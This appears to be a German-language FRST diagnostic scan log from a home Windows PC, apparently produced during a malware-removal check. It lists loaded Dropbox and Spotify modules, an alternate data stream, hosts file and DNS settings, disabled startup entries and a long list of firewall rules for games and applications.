2017-07-14 19:07 - 2017-07-12 22:01 - 000054608 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winrpcserver.compiled._RPCServer.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.user32.compiled._winffi_user32.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000069968 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022872 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.iphlpapi.compiled._winffi_iphlpapi.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000021848 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.winerror.compiled._winffi_winerror.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022872 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.wininet.compiled._winffi_wininet.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000349128 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000103232 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWinExtras.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000023896 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000025936 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000036296 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\librsync.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 000033112 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000293392 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 000181056 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2017-07-14 19:07 - 2017-07-12 22:01 - 000030536 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\wind3d11.compiled._wind3d11.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000024368 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libEGL.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 001637688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2017-07-14 19:07 - 2017-07-12 22:01 - 000026456 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.winhttp.compiled._winffi_winhttp.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.shcore.compiled._winffi_shcore.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000023368 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\wincrashpad.compiled._Crashpad.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000546104 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000357688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll
2017-07-02 14:53 - 2017-06-20 16:59 - 022908928 _____ () G:\Program Files (x86)\The Elder Scrolls Online\Launcher\libcef.dll
2017-03-13 19:39 - 2016-05-23 22:49 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\webres.dll
2017-03-13 19:39 - 2016-10-18 17:57 - 000631072 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\ProductStatistics.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [{BDE3FBE0-1EB1-483E-95ED-69A353C856D3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DyingLightGame.exe
FirewallRules: [{91B18C99-C09D-431D-9942-1E8FF120D11F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DyingLightGame.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [{14474F9C-03AD-4494-B15F-0C40BBA1049E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
FirewallRules: [{ADCF6E91-1091-4881-B439-BBC1A337404C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EC5D9F1C-0712-4115-82E5-8A4DFB287171}] => (Allow) G:\Program Files (x86)\Origin Games\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{AB4BC1BF-E0E1-484B-85BB-BE6D456834A0}] => (Allow) G:\Program Files (x86)\Origin Games\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{2AA5D29E-9956-4801-89E0-314D5D360729}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{D76C6855-9A37-4F88-9DD6-996F46A272C4}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{65F0AC5B-FAD0-4DCB-97AB-96BBB9E57190}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\State of Decay\StateOfDecay.exe
FirewallRules: [{3E6A480D-F34A-4741-98C6-B1F9536E20CE}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\State of Decay\StateOfDecay.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{D8364153-FBDA-4BF8-874F-3EF0AA7A2CA2}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{3511DCB6-3696-4003-9724-E9984F76E1A4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{A4441CA1-9D96-4E38-A86D-A0A9BE2CDD61}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{19DCF7E7-BB17-45EA-9008-66334D30A0D1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe
